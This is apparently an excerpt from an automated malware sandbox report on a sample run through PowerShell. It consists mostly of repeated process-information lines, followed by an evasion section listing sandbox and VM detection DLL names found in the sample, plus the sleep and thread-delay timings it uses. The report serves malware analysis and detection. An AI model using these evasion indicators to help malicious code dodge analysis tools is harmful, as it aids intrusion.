Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Binary or memory string: DIR_WATCH.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Binary or memory string: SBIEDLL.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Binary or memory string: API_LOG.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr Binary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Memory allocated: 29B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Window / User API: threadDelayed 775
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Window / User API: threadDelayed 9067
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1068
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 458
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2182
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1553
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6815
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2907
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1346
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 615
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7908
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1753
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99812s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99687s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99578s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99469s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99359s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99249s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99140s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99031s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98922s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98812s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98703s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98593s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98484s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98375s >= -30000s
